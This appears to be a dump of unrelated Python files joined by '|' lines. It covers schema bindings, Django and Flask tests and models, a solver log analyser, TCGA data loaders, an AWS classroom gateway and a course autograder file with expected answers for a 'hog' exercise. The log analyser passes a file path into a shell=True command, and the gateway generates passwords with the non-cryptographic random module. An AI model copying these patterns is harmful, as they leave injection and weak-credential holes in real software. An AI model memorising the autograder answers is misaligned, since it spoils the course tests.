assert isinstance(paid_date, datetime)
rec.paid_date = paid_date.date()
rec.full_clean()
rec.save()
return stm
|
from dataclasses import dataclass, field
from enum import Enum
from typing import Optional
__NAMESPACE__ = "NISTSchema-SV-IV-atomic-unsignedByte-enumeration-5-NS"
class NistschemaSvIvAtomicUnsignedByteEnumeration5Type(Enum):
VALUE_1 = 1
VALUE_21 = 21
VALUE_55 = 55
VALUE_9 = 9
VALUE_132 = 132
VALUE_255 = 255
VALUE_17 = 17
@dataclass
class NistschemaSvIvAtomicUnsignedByteEnumeration5:
class Meta:
name = "NISTSchema-SV-IV-atomic-unsignedByte-enumeration-5"
namespace = "NISTSchema-SV-IV-atomic-unsignedByte-enumeration-5-NS"
value: Optional[NistschemaSvIvAtomicUnsignedByteEnumeration5Type] = field(
default=None,
metadata={
"required": True,
}
)
|
# setup.py
import configparser
import os
import const
config = configparser.RawConfigParser()
setup_path = os.path.dirname(os.path.realpath(__file__))
config.read(setup_path + '/config.ini')
config = config[const.DEFAULT]
|
#Desafio 8 Escreva um programa que leia um valor em metros e o exiba convertido em centímetro e milímetros
print('{:=^20}'.format('Desafio 8'))
metros=float(input('Quantos metros ? '))
KM=metros/1000
hm=metros/100
decam=metros/10
diam=metros*10
cent=metros*100
mili=metros*1000
print('Conversão de {}m para demais unidades:\n {:.3F}KM\n {:.2F} Hectometros\n {:.1F} Decâmetro\n {:.0f} Diâmetro \n {:.0f}cm\n {:.0f}mm '.format(metros,KM,hm,decam,diam,cent,mili))
|
import json
import datetime
from bson import json_util
from tests.TestingSuite import BaseTestingSuite
class TestIotUpdateResource(BaseTestingSuite):
def setUp(self):
print("Testing Iot Update resources...")
super().setUp()
def test_successful_iot_entry(self):
new_entry = {
'timestamp': datetime.datetime.now().isoformat(),
'building': "test building",
'building_id': "test id",
'count': 10,
'endpoint': "test endpoint",
'endpoint_id':"test endpoint id",
'room_capacity': 50
}
response = self.app.post('/api/data/iot/update',
headers={
'Content-Type': 'application/json'
},
data=json.dumps(new_entry,
default=json_util.default))
self.assertEqual(f'New entry was added successfully {new_entry["count"]}', response.json['message'])
self.assertEqual(200, response.status_code)
def test_bad_schema_error(self):
new_entry = {
'timestamp': datetime.datetime.now().isoformat(),
'building': "test building",
# 'building_id': "test id",
'count': 10,
'endpoint': "test endpoint",
'endpoint_id':"test endpoint id",
'room_capacity': 50
}
response = self.app.post('/api/data/iot/update',
headers={
'Content-Type': 'application/json'
},
data=json.dumps(new_entry,
default=json_util.default))
self.assertEqual('Request is missing required fields.', response.json['message'])
self.assertEqual(400, response.status_code)
|
#!/usr/bin/env python3
from argparse import ArgumentParser
from glob import glob
from os import path
from subprocess import run, CalledProcessError
from tempfile import TemporaryDirectory
from zipfile import ZipFile, BadZipFile
from database.connection_manager import get_connection
from database.database_config import load_config
from database.sqlqueries.insert_queries import INSERT_LOG_ANALYSIS
from database.sqlqueries.table_queries import (
STRING_SCHEMA,
QF_SQ_SCHEMA,
Q_SQ_SCHEMA,
SCHEMA_PLACEHOLDER,
SOLVER_PLACEHOLDER,
)
class LogAnalysisResult:
def __init__(self, res):
self.result = res
self.model_confirmed = "unkown"
self.unsat_core_confirmed = "unknown"
def unzip_folder(zipped_folder, name, fixing=False):
print("unzipping")
try:
with ZipFile(zipped_folder, "r") as zipped:
zipped.extractall(name)
except BadZipFile:
print("Problem due to bad zip file state with:", name)
if fixing:
outname = path.join(name, "fixed.zip")
try:
run(
" ".join(
["yes", "|", "zip", "-FF", zipped_folder, "--out", outname]
),
check=True,
shell=True,
)
except CalledProcessError:
print("Cannot fix")
unzip_folder(outname, name)
def enumerate_logs(folder):
result = []
print(path.join(folder, "*.log"))
for file in glob(path.join(folder, "**", "*.log"), recursive=True):
result.append(process_file(file))
return result
def analyze_logs(zipped_logs, schema, fixing=False):
SQ = schema.upper() == "SQ"
for file in glob(path.join(zipped_logs, "*logfiles.zip")):
basename = path.basename(file).split(".")[0]
runtime = path.basename(file).split(".")[-3]
print(runtime, file)
runtime_parts = runtime.split("_")
runtime = runtime_parts[0] + " " + runtime_parts[1].replace("-", ":")
print(basename, file)
solver, benchmark = basename.split("_", 1)
print(
f"benchmark: {benchmark}",
benchmark.startswith("QF_"),
schema,
schema.upper(),
schema.upper() == "SQ",
)
if SQ and benchmark.startswith("QF_"):
schema = QF_SQ_SCHEMA
elif SQ:
schema = Q_SQ_SCHEMA
print(f"Going to insert into schema: {schema}")
if solver.upper() == "ABC-SMT":
solver = "ABC"
if solver == "cvc5-problems":
solver = "CVC4"
solver = solver.replace("-", "_")
print(file, solver, benchmark)
with TemporaryDirectory() as tmpFolder:
unzip_folder(file, tmpFolder, fixing)
result_rows = enumerate_logs(tmpFolder)
with get_connection(load_config()) as conn:
with conn.cursor() as cursor:
for name, status, model_confirmed, unsat_core_confirmed in result_rows:
try:
bid = int(name.split("_", 1)[0])
except ValueError:
print("error extracting benchmark id from:", name, "skipped")
continue
query = INSERT_LOG_ANALYSIS.replace(
SCHEMA_PLACEHOLDER, schema
).replace(SOLVER_PLACEHOLDER, solver.upper())
cursor.execute(
query,
(
bid,
status,
model_confirmed,
unsat_core_confirmed,
benchmark,
runtime,
),
)
conn.commit()
def process_file(file):
with open(file) as inputfile:
status = LogAnalysisResult("unknown")
for line in inputfile:
line = line.strip()
if line == "RESULT: UNSAT" or line == "unsat":
status.result = "false"
elif line == "RESULT: SAT" or line == "sat":
status.result = "true"
elif line == "EVALUATED: true":
status.model_confirmed = "true"
elif line == "EVALUATED: false":
status.model_confirmed = "false"
elif line == "Checking unsat core":
status.unsat_core_confirmed = "false"
elif line == "UNSAT Core confirmed":
status.unsat_core_confirmed = "true"
elif (
line.startswith("(error ")
and line != '(error "no model available")'
and line
!= '(error "Cannot get model unless immediately preceded by SAT/NOT_ENTAILED or UNKNOWN response.")'
and not "model is not available" in line
and not "check annotation that says sat" in line
):
if status:
status.result = "ERROR (overwritten)"
else:
status.result = "ERROR"
elif line.startswith("*** Check failure stack trace: ***"):
status.result = "ERROR"
elif line.startswith(
'Exception in thread "main" java.lang.OutOfMemoryError'
):
status.result = "Out Of Memory"
elif line.startswith("Timeout in process Solver"):
status.result = "TIMEOUT"
problem_name = ".".join(path.basename(file).split(".")[1:-2])
return (
problem_name,
status.result,
status.model_confirmed,
status.unsat_core_confirmed,
)
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("-i", "--logfile-folder", required=True)
parser.add_argument("-s", "--schema", required=True)
parser.add_argument("--fix-broken", action="store_true")
args = vars(parser.parse_args())
print(args)
analyze_logs(args["logfile_folder"], args["schema"], args["fix_broken"])
|
from django.db import models
from django.conf import settings
class Note(models.Model):
author = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='notes')
subject = models.CharField(max_length=100)
note = models.TextField(blank=True,null=True)
|
#!/usr/bin/env python
# Copyright (c) 2006-2019 Andrey Golovigin
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import print_function, unicode_literals, with_statement
import re
import sys
from os import path
from shutil import rmtree
from subprocess import PIPE, Popen
from tempfile import mkdtemp
from pybtex.database import BibliographyData, Entry, Person
from pybtex.database.output import bibtex
from pybtex.errors import report_error
from pybtex.exceptions import PybtexError
writer = bibtex.Writer(encoding='ascii')
def write_aux(filename, citations):
with open(filename, 'w') as aux_file:
for citation in citations:
aux_file.write('\\citation{%s}\n' % citation)
aux_file.write('\\bibdata{test}\n')
aux_file.write('\\bibstyle{test}\n')
def write_bib(filename, database):
writer.write_file(database, filename)
def write_bst(filename, style):
with open(filename, 'w') as bst_file:
bst_file.write(style)
bst_file.write('\n')
def run_bibtex(style, database, citations=None):
if citations is None:
citations = list(database.entries.keys())
tmpdir = mkdtemp(prefix='pybtex_test_')
try:
write_bib(path.join(tmpdir, 'test.bib'), database)
write_aux(path.join(tmpdir, 'test.aux'), citations)
write_bst(path.join(tmpdir, 'test.bst'), style)
bibtex = Popen(('bibtex', 'test'), cwd=tmpdir, stdout=PIPE, stderr=PIPE)
stdout, stderr = bibtex.communicate()
if bibtex.returncode:
report_error(PybtexError(stdout))
with open(path.join(tmpdir, 'test.bbl')) as bbl_file:
result = bbl_file.read()
return result
finally:
pass
rmtree(tmpdir)
def execute(code, database=None):
if database is None:
database = BibliographyData(entries={'test_entry': Entry('article')})
bst = """
ENTRY {name format} {} {}
FUNCTION {article}
{
%s write$ newline$
}
READ
ITERATE {call.type$}
""".strip() % code
result = ' '.join(run_bibtex(bst, database).splitlines())
return result
def format_name(name, format):
return execute('"%s" #1 "%s" format.name$' % (name, format))
def parse_name(name):
space = re.compile('[\s~]+')
formatted_name = format_name(name, '{ff}|{vv}|{ll}|{jj}')
parts = [space.sub(' ', part.strip()) for part in formatted_name.split('|')]
first, von, last, junior = parts
return Person(first=first, prelast=von, last=last, lineage=junior)
def main():
args = sys.argv[1:2]
if len(args) != 1:
print("usage: run_bibtex 'some bibtex code'")
sys.exit(1)
code = args[0]
print(execute(code))
if __name__ == '__main__':
main()
|
from Utils.string_utils import clear_spaces as clear
def test_validation_all_contacts_info(app, db):
ui_contacts_list = app.contact.get_contact_list()
db_contacts_list = db.get_contact_list()
assert len(ui_contacts_list) == len(db_contacts_list)
for ui_contact in ui_contacts_list:
db_contact = next(filter(lambda x: x.contact_id == ui_contact.contact_id, db_contacts_list), None)
assert db_contact is not None
assert clear(ui_contact.first_name) == clear(db_contact.first_name)
assert clear(ui_contact.last_name) == clear(db_contact.last_name)
assert clear(ui_contact.address) == clear(db_contact.address)
assert clear(ui_contact.all_emails_from_home_page) == clear(db_contact.merge_emails_like_on_home_page(False))
assert clear(ui_contact.all_phones_from_home_page) == clear(db_contact.merge_phones_like_on_home_page())
|
test = {
'name': 'Question 11',
'points': 2,
'suites': [
{
'cases': [
{
'code': r"""
>>> swap_strategy(12, 60, 8, 6)
962aea5f59fc55bd65ccacf4603c8f22
# locked
""",
'hidden': False,
'locked': True
},
{
'code': r"""
>>> swap_strategy(30, 54, 8, 6)
327b19ffebddf93982e1ad2a4a6486f4
# locked
""",
'hidden': False,
'locked': True
},
{
'code': r"""
>>> swap_strategy(7, 24, 8, 6)
6
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> swap_strategy(7, 28, 8, 6)
0
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> from tests.check_strategy import check_strategy
>>> check_strategy(swap_strategy)
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': r"""
>>> from hog import *
""",
'teardown': '',
'type': 'doctest'
},
{
'cases': [
{
'code': r"""
>>> swap_strategy(10, 28, 8, 6) # beneficial
0
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> swap_strategy(9, 1, 8, 6)
6
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> swap_strategy(44, 24, 8, 6)
6
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> swap_strategy(37, 24, 8, 6)
6
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': r"""
>>> from hog import *
""",
'teardown': '',
'type': 'doctest'
}
]
}
|
class BackendPortPortNumber(object):
def read_get(self, name, idx_name, unity_client):
return unity_client.get_backend_port_port_number(idx_name)
class BackendPortPortNumberColumn(object):
def get_idx(self, name, idx, unity_client):
return unity_client.get_backend_ports()
|
def additive_hash(input_string: str) -> int:
"""A stable hash function."""
value = 0
for character in input_string:
value += ord(character)
return value
|
"""
Functions for reading and processing input data
"""
import os
import sys
from pathlib import Path
import numpy as np
import pandas as pd
import pickle as pkl
from sklearn.model_selection import KFold, StratifiedKFold
from sklearn.preprocessing import MinMaxScaler
import pancancer_evaluation.config as cfg
def load_expression_data(scale_input=False, verbose=False, debug=False):
"""Load and preprocess saved TCGA gene expression data.
Arguments
---------
scale_input (bool): whether or not to scale the expression data
verbose (bool): whether or not to print verbose output
debug (bool): whether or not to subset data for faster debugging
Returns
-------
rnaseq_df: samples x genes expression dataframe
"""
if debug:
if verbose:
print('Loading subset of gene expression data for debugging...',
file=sys.stderr)
rnaseq_df = pd.read_csv(cfg.test_expression, index_col=0, sep='\t')
else:
if verbose:
print('Loading gene expression data...', file=sys.stderr)
rnaseq_df = pd.read_csv(cfg.rnaseq_data, index_col=0, sep='\t')
# Scale RNAseq matrix the same way RNAseq was scaled for
# compression algorithms
if scale_input:
fitted_scaler = MinMaxScaler().fit(rnaseq_df)
rnaseq_df = pd.DataFrame(
fitted_scaler.transform(rnaseq_df),
columns=rnaseq_df.columns,
index=rnaseq_df.index,
)
return rnaseq_df
def load_pancancer_data(verbose=False, test=False, subset_columns=None):
"""Load pan-cancer relevant data from previous Greene Lab repos.
Data being loaded includes:
* sample_freeze_df: list of samples from TCGA "data freeze" in 2017
* mutation_df: deleterious mutation count information for freeze samples
(this is a samples x genes dataframe, entries are the number of
deleterious mutations in the given gene for the given sample)
* copy_loss_df: copy number loss information for freeze samples
* copy_gain_df: copy number gain information for freeze samples
* mut_burden_df: log10(total deleterious mutations) for freeze samples
Most of this data was originally compiled and documented in Greg's
pancancer repo: http://github.com/greenelab/pancancer
See, e.g.
https://github.com/greenelab/pancancer/blob/master/scripts/initialize/process_sample_freeze.py
for more info on mutation processing steps.
Arguments
---------
verbose (bool): whether or not to print verbose output
Returns
-------
pancan_data: TCGA "data freeze" mutation information described above
"""
# loading this data from the pancancer repo is very slow, so we
# cache it in a pickle to speed up loading
if test:
data_filepath = cfg.test_pancan_data
else:
data_filepath = cfg.pancan_data
if os.path.exists(data_filepath):
if verbose:
print('Loading pan-cancer data from cached pickle file...', file=sys.stderr)
with open(data_filepath, 'rb') as f:
pancan_data = pkl.load(f)
else:
if verbose:
print('Loading pan-cancer data from repo (warning: slow)...', file=sys.stderr)
pancan_data = load_pancancer_data_from_repo(subset_columns)
with open(data_filepath, 'wb') as f:
pkl.dump(pancan_data, f)
return pancan_data
def load_top_50():
"""Load top 50 mutated genes in TCGA from BioBombe repo.
These were precomputed for the equivalent experiments in the
BioBombe paper, so no need to recompute them.
"""
base_url = "https://github.com/greenelab/BioBombe/raw"
commit = "aedc9dfd0503edfc5f25611f5eb112675b99edc9"
file = "{}/{}/9.tcga-classify/data/top50_mutated_genes.tsv".format(
base_url, commit)
genes_df = pd.read_csv(file, sep='\t')
return genes_df
def load_vogelstein():
"""Load list of cancer-relevant genes from Vogelstein and Kinzler,
Nature Medicine 2004 (https://doi.org/10.1038/nm1087)
These genes and their oncogene or TSG status were precomputed in
the pancancer repo, so we just load them from there.
"""
base_url = "https://github.com/greenelab/pancancer/raw"
commit = "2a0683b68017fb226f4053e63415e4356191734f"
file = "{}/{}/data/vogelstein_cancergenes.tsv".format(
base_url, commit)
genes_df = (
pd.read_csv(file, sep='\t')
.rename(columns={'Gene Symbol' : 'gene',
'Classification*': 'classification'})
)
return genes_df
def get_classification(gene, genes_df=None):
"""Get oncogene/TSG classification from existing datasets for given gene."""
classification = 'neither'
if (genes_df is not None) and (gene in genes_df.gene):
classification = genes_df[genes_df.gene == gene].classification.iloc[0]
else:
genes_df = load_vogelstein()
if gene in genes_df.gene:
classification = genes_df[genes_df.gene == gene].classification.iloc[0]
else:
genes_df = load_top_50()
if gene in genes_df.gene:
classification = genes_df[genes_df.gene == gene].classification.iloc[0]
return classification
def load_pancancer_data_from_repo(subset_columns=None):
"""Load data to build feature matrices from pancancer repo. """
base_url = "https://github.com/greenelab/pancancer/raw"
commit = "2a0683b68017fb226f4053e63415e4356191734f"
file = "{}/{}/data/sample_freeze.tsv".format(base_url, commit)
sample_freeze_df = pd.read_csv(file, index_col=0, sep='\t')
file = "{}/{}/data/pancan_mutation_freeze.tsv.gz".format(base_url, commit)
mutation_df = pd.read_csv(file, index_col=0, sep='\t')
file = "{}/{}/data/copy_number_loss_status.tsv.gz".format(base_url, commit)
copy_loss_df = pd.read_csv(file, index_col=0, sep='\t')
file = "{}/{}/data/copy_number_gain_status.tsv.gz".format(base_url, commit)
copy_gain_df = pd.read_csv(file, index_col=0, sep='\t')
file = "{}/{}/data/mutation_burden_freeze.tsv".format(base_url, commit)
mut_burden_df = pd.read_csv(file, index_col=0, sep='\t')
if subset_columns is not None:
# don't reindex sample_freeze_df or mut_burden_df
# they don't have gene-valued columns
mutation_df = mutation_df.reindex(subset_columns, axis='columns')
copy_loss_df = copy_loss_df.reindex(subset_columns, axis='columns')
copy_gain_df = copy_gain_df.reindex(subset_columns, axis='columns')
return (
sample_freeze_df,
mutation_df,
copy_loss_df,
copy_gain_df,
mut_burden_df
)
def load_sample_info(verbose=False):
if verbose:
print('Loading sample info...', file=sys.stderr)
return pd.read_csv(cfg.sample_info, sep='\t', index_col='sample_id')
def split_stratified(rnaseq_df, sample_info_df, num_folds=4, fold_no=1,
seed=cfg.default_seed):
"""Split expression data into train and test sets.
The train and test sets will both contain data from all cancer types,
in roughly equal proportions.
Arguments
---------
rnaseq_df (pd.DataFrame): samples x genes expression dataframe
sample_info_df (pd.DataFrame): maps samples to cancer types
num_folds (int): number of cross-validation folds
fold_no (int): cross-validation fold to hold out
seed (int): seed for deterministic splits
Returns
-------
rnaseq_train_df (pd.DataFrame): samples x genes train data
rnaseq_test_df (pd.DataFrame): samples x genes test data
"""
# subset sample info to samples in pre-filtered expression data
sample_info_df = sample_info_df.reindex(rnaseq_df.index)
# generate id for stratification
# this is a concatenation of cancer type and sample/tumor type, since we want
# to stratify by both
sample_info_df = sample_info_df.assign(
id_for_stratification = sample_info_df.cancer_type.str.cat(
sample_info_df.sample_type)
)
# recode stratification id if they are singletons or near-singletons,
# since these won't work with StratifiedKFold
stratify_counts = sample_info_df.id_for_stratification.value_counts().to_dict()
sample_info_df = sample_info_df.assign(
stratify_samples_count = sample_info_df.id_for_stratification
)
sample_info_df.stratify_samples_count = sample_info_df.stratify_samples_count.replace(
stratify_counts)
sample_info_df.loc[
sample_info_df.stratify_samples_count < num_folds, 'id_for_stratification'
] = 'other'
# now do stratified CV splitting and return the desired fold
kf = StratifiedKFold(n_splits=num_folds, shuffle=True, random_state=seed)
for fold, (train_ixs, test_ixs) in enumerate(
kf.split(rnaseq_df, sample_info_df.id_for_stratification)):
if fold == fold_no:
train_df = rnaseq_df.iloc[train_ixs]
test_df = rnaseq_df.iloc[test_ixs]
return train_df, test_df, sample_info_df
def split_by_cancer_type(rnaseq_df,
sample_info_df,
holdout_cancer_type,
use_pancancer=False,
use_pancancer_only=False,
num_folds=4,
fold_no=1,
seed=cfg.default_seed):
"""Split expression data into train and test sets.
The test set will contain data from a single cancer type. The train set
will contain either the remaining data from that cancer type, or the
remaining data from that cancer type and data from all other cancer types
in the dataset.
Arguments
---------
rnaseq_df (pd.DataFrame): samples x genes expression dataframe
sample_info_df (pd.DataFrame): maps samples to cancer types
holdout_cancer_type (str): cancer type to hold out
use_pancancer (bool): whether or not to include pan-cancer data in train set
use_pancancer_only (bool): if True, use only pan-cancer data as train set
(i.e. without data from the held-out cancer type)
num_folds (int): number of cross-validation folds
fold_no (int): cross-validation fold to hold out
seed (int): seed for deterministic splits
Returns
-------
rnaseq_train_df (pd.DataFrame): samples x genes train data
rnaseq_test_df (pd.DataFrame): samples x genes test data
"""
cancer_type_sample_ids = (
sample_info_df.loc[sample_info_df.cancer_type == holdout_cancer_type]
.index
)
cancer_type_df = rnaseq_df.loc[rnaseq_df.index.intersection(cancer_type_sample_ids), :]
cancer_type_train_df, rnaseq_test_df = split_single_cancer_type(
cancer_type_df, num_folds, fold_no, seed)
if use_pancancer or use_pancancer_only:
pancancer_sample_ids = (
sample_info_df.loc[~(sample_info_df.cancer_type == holdout_cancer_type)]
.index
)
pancancer_df = rnaseq_df.loc[rnaseq_df.index.intersection(pancancer_sample_ids), :]
if use_pancancer:
rnaseq_train_df = pd.concat((pancancer_df, cancer_type_train_df))
elif use_pancancer_only:
rnaseq_train_df = pancancer_df
else:
rnaseq_train_df = cancer_type_train_df
return rnaseq_train_df, rnaseq_test_df
def split_single_cancer_type(cancer_type_df, num_folds, fold_no, seed):
"""Split data for a single cancer type into train and test sets."""
kf = KFold(n_splits=num_folds, shuffle=True, random_state=seed)
for fold, (train_ixs, test_ixs) in enumerate(kf.split(cancer_type_df)):
if fold == fold_no:
train_df = cancer_type_df.iloc[train_ixs]
test_df = cancer_type_df.iloc[test_ixs]
return train_df, test_df
def summarize_results(results, gene, holdout_cancer_type, signal, z_dim,
seed, algorithm, data_type):
"""
Given an input results file, summarize and output all pertinent files
Arguments
---------
results: a results object output from `get_threshold_metrics`
gene: the gene being predicted
holdout_cancer_type: the cancer type being used as holdout data
signal: the signal of interest
z_dim: the internal bottleneck dimension of the compression model
seed: the seed used to compress the data
algorithm: the algorithm used to compress the data
data_type: the type of data (either training, testing, or cv)
"""
results_append_list = [
gene,
holdout_cancer_type,
signal,
z_dim,
seed,
algorithm,
data_type,
]
metrics_out_ = [results["auroc"], results["aupr"]] + results_append_list
roc_df_ = results["roc_df"]
pr_df_ = results["pr_df"]
roc_df_ = roc_df_.assign(
predictor=gene,
signal=signal,
z_dim=z_dim,
seed=seed,
algorithm=algorithm,
data_type=data_type,
)
pr_df_ = pr_df_.assign(
predictor=gene,
signal=signal,
z_dim=z_dim,
seed=seed,
algorithm=algorithm,
data_type=data_type,
)
return metrics_out_, roc_df_, pr_df_
|
try:
import binutil # required to import from dreamcoder modules
except ModuleNotFoundError:
import bin.binutil # alt import if called as module
from neural_seq.model import main
from neural_seq.utils import commandLineArgs
from neural_seq import decoderUtils
import os
if __name__ == '__main__':
print("current PID:{}".format(os.getpid()))
args = commandLineArgs()
main(args)
|
# This file contains the objects to be used in conjunction with SQLAlchemy
# Separating this file into so that the cloud computing elements are in their own module would allow
# for a more loosely coupled architecture.
import string
import random
import boto3
from sqlalchemy import create_engine, Column, Integer, String, ForeignKey, Boolean
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import json
import time
import bcrypt
engine = create_engine('sqlite:///gateway.db', echo=True)
Base = declarative_base()
ec2 = boto3.resource('ec2')
client = boto3.client('ec2')
Session = sessionmaker(bind=engine)
class dbUser(Base):
# Use set functions to create these based on the need
__tablename__ = "dbUser"
userName = Column('username', Integer, primary_key=True)
password = Column('password', String(16), unique=True)
firstName = Column('firstname', String(20), nullable=False)
lastName = Column('lastname', String(20), nullable=False)
eMail = Column('email', String(20), nullable=False)
studentID = Column('id', Integer, unique=True)
assigned_VM = Column('userVM', String, ForeignKey('dbComputer.InstanceIpAddress'))
isTeacher = Column('teacher', Boolean, default=False)
isSuspended = Column('suspended', Boolean, default=False)
visitorsLog = Column('vLog', String)
def __repr__(self):
return f"User('{self.userName}', '{self.firstName}', '{self.lastName}', '{self.assigned_VM}')"
def __init__(self, fN, lN, ID, eM = None):
self.firstName = fN
self.lastName = lN
self.studentID = ID
self.eMail = eM
self.userName = self.studentID
# This function creates a user_name from the student ID
def set_auto_user_name(self):
self.userName = self.studentID
# This function creates a random password of 8 characters.
def set_auto_password(self, size = 8, chars=string.ascii_letters + string.digits + string.punctuation):
unencrypted_password = ''.join(random.choice(chars) for _ in range(size))
salt = bcrypt.gensalt()
hatch = bcrypt.hashpw(unencrypted_password.encode('utf-8'), salt)
self.password = hatch
return unencrypted_password
def set_custom_user_name(self, uN):
self.userName = uN
def set_custom_password(self, pW):
salt = bcrypt.gensalt()
hatch = bcrypt.hashpw(pW.encode('utf-8'), salt)
self.password = hatch
def set_suspension(self, bool):
self.isSuspended = bool
def set_teacher(self, bool):
self.isTeacher = bool
def get_suspension(self):
return self.isSuspended
def get_teacher(self):
return self.isTeacher
def get_password(self):
return self.password
def get_user_name(self):
return self.userName
def get_log(self):
return json.loads(self.visitorsLog)
def set_log(self, dict_json):
self.visitorsLog = json.dumps(dict_json)
def add_to_log(self, key, value):
dict_log = self.get_log()
dict_log[key] = value
self.set_log(dict_log)
class dbComputer(Base):
__tablename__ = "dbComputer"
InstanceId = Column('instanceId', String, primary_key=True)
InstanceIpAddress = Column('InstanceIpAddress', String)
InstanceLog = Column('log', String)
def __init__(self, aimID, type, key, security_group):
instance = ec2.create_instances(
ImageId=aimID,
MinCount=1,
MaxCount=1,
InstanceType=type,
KeyName=key,
SecurityGroupIds=security_group
)
self.instanceObject = instance[0]
self.InstanceId = self.instanceObject.id
def start_instance(self):
client.start_instances(InstanceIds=[self.InstanceId])
start = time.time()
self.add_to_log("Start Time", start)
def stop_instance(self):
client.stop_instances(InstanceIds=[self.InstanceId])
# end = time.time()
log = self.get_log()
end = time.time()
start = log["Start Time"]
duration = end - start
if log["On Time"]:
onTime = log["On Time"]
onTime.append(duration)
log["On Time"] = onTime
self.set_log(log)
def delete_instance(self):
client.terminate_instances(InstanceIds=[self.InstanceId])
def get_instance_ip(self):
instance = ec2.Instance(self.InstanceId)
self.InstanceIpAddress = instance.public_ip_address
return self.InstanceIpAddress
def get_instance_id(self):
return self.InstanceId
# Must implement some kind of timeout. /Check if function "wait" has a time out/
def is_instance_ready(self):
waiter = client.get_waiter('instance_status_ok')
waiter.wait(InstanceIds=[self.InstanceId])
return True
def get_up_time(self):
log = self.get_log()
log_times = log["On Time"]
total_up_time = 0
for period in log_times:
total_up_time += period
return total_up_time
def get_log(self):
log = self.InstanceLog
if log is not None:
return json.loads(log)
else:
return {}
def set_log(self, dict_json):
self.InstanceLog = json.dumps(dict_json)
def add_to_log(self, key, value):
dict_log = self.get_log()
dict_log[key] = value
self.set_log(dict_log)
def get_info(self):
response = client.describe_instances(InstanceIds=[self.InstanceId])
return response
# Base.metadata.drop_all(engine)
# Base.metadata.create_all(engine)
|
from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
class Finca(models.Model):
nombre_finca = models.CharField(max_length=150, unique=True)
ubicacion = models.CharField(max_length=150)
latitud = models.CharField(max_length=150)
longitud = models.CharField(max_length=150)
propietario = models.ForeignKey('CustomUser', on_delete=models.CASCADE)
imagen = models.ImageField(upload_to='images/')
create_at= models.DateTimeField(auto_now=True)
estado=models.BooleanField(default=False)
def __str__(self):
return self.nombre_finca
class Cultivo(models.Model):
nombre_lote = models.CharField(max_length=150)
dimancion_lote = models.CharField(max_length=150)
fecha_siembra = models.DateField()
tiempo_cosecha = models.CharField(max_length=150)
planta = models.ForeignKey('Planta', on_delete=models.CASCADE)
finca = models.ForeignKey('Finca', on_delete=models.CASCADE)
create_at= models.DateTimeField(auto_now=True)
estado=models.BooleanField(default=False)
def __str__(self):
return self.nombre_lote
class Planta(models.Model):
nombre_planta = models.CharField(max_length=150, unique=True)
nombre_cientifico = models.CharField(max_length=150)
familia = models.CharField(max_length=150)
genero = models.CharField(max_length=150)
imagen = models.ImageField(upload_to='images/')
create_at= models.DateTimeField(auto_now=True)
estado=models.BooleanField(default=False)
def __str__(self):
return self.nombre_planta
class Expediente(models.Model):
finca = models.OneToOneField('Finca', on_delete=models.CASCADE, unique=True)
propietario = models.ForeignKey('CustomUser', on_delete=models.CASCADE)
direccion = models.CharField(max_length=150)
total_cultivos = models.CharField(max_length=150)
identificacion = models.CharField(max_length=150)
plantas_existentes = models.CharField(max_length=150)
total_plantas = models.CharField(max_length=150)
create_at= models.DateTimeField(auto_now=True)
estado=models.BooleanField(default=False)
class CustomUser(AbstractUser):
cedula = models.CharField(max_length=10,unique=True)
celular = models.CharField(max_length=10)
email = models.EmailField(unique=True)
type_user = models.CharField(max_length=10)
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ["email","cedula"]
create_at= models.DateTimeField(auto_now=True)
estado=models.BooleanField(default=False)
def __str__(self):
return self.username
|
#!/usr/bin/env python
# D. Nidever
#
# testdlinterface.py
# Python code to (unit) test the DL Interface operations
from dl.dlinterface import Dlinterface
from dl import authClient, storeClient, queryClient
import os
import unittest
try:
from urllib import urlencode, quote_plus # Python 2
from urllib2 import urlopen, Request # Python 2
except ImportError:
from urllib.parse import urlencode, quote_plus # Python 3
from urllib.request import urlopen, Request # Python 3
import requests
from astropy.table import Table
import numpy as np
from io import StringIO
import time
import sys
class Capturing(list):
def __enter__(self):
self._stdout = sys.stdout
sys.stdout = self._stringio = StringIO()
return self
def __exit__(self, *args):
self.extend(self._stringio.getvalue().splitlines())
del self._stringio # free up some memory
sys.stdout = self._stdout
# Service URLs
AM_URL = "http://dlsvcs.datalab.noao.edu/auth" # Auth Manager
SM_URL = "http://dlsvcs.datalab.noao.edu/storage" # Storage Manager
QM_URL = "http://dlsvcs.datalab.noao.edu/query" # Query Manager
# Test token
TEST_TOKEN = "dltest.99998.99998.test_access"
# Create test data sample
testdata = 'id,ra,dec\n'\
'77.1096574,150.552192729936,-32.7846851370221\n'\
'77.572838,150.55443538686,-32.7850014657006\n'
qryresid = np.array(['77.1096574','77.572838'])
qryresra = np.array([150.552192729936,150.55443538686])
qryresdec = np.array([-32.7846851370221,-32.7850014657006])
# Test query
qry = "select id,ra,dec from smash_dr1.object where "\
